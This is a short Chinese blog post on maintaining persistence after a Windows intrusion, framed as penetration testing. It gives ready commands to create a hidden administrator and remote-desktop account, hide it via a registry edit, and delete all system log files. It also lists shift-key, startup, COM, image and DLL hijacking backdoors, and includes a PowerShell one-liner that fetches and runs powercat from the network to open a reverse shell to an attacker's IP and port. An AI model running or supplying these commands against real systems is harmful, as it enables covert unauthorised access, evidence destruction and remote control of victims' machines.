• 渗透测试之权限维持的方法


    权限维持的方法

    基本上现在常见的方法有以下几种:

    1、隐藏、克隆账户

    windows 隐藏账户

    net localgroup “Domain Admin” test$ /add

    net user test$ test /add
    net localgroup Administrators test$ /add
    net localgroup "Remote Desktop Users" test$ /add
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v test$ /T REG_DWORD /D 0
    net user test$ /del
    del %WINDIR%*.log /a/s/q/f 删除所有日志文件
    2、shift后门
    3、启动项、计划任务
    C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsstartup

    4、劫持技术
    com劫持
    映像劫持 : 改注册表,debugger
    dll劫持,clr
    5、Powershell后门
    powershell IEX (New-Object

    System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd

    详细步骤链接:https://www.cnblogs.com/xiaozi/p/7613288.html

  • 相关阅读:
    U盘安装Ubuntu 10.4 Server
    MySQL操作使用
    Fedora17安装MySQL及配置
    笔记:重构
    Java 并发之线程安全
    Java 并发之共享对象
    UTF8 与 UTF16 编码
    matplotlib 初使用
    用 ggplot2 在同一个图上画多条颜色不同的线
    完成情况(一)
  • 原文地址:https://www.cnblogs.com/mutudou/p/11835756.html
Copyright © 2020-2023  润新知